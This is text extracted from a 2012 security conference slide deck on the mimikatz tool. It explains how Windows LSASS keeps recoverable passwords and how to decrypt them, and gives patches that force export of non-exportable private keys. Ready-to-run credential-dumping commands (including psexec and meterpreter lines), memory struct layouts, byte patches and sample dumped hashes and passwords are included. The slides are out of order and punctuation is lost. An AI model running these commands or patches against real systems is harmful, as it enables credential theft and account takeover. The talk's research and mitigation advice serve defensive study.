typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
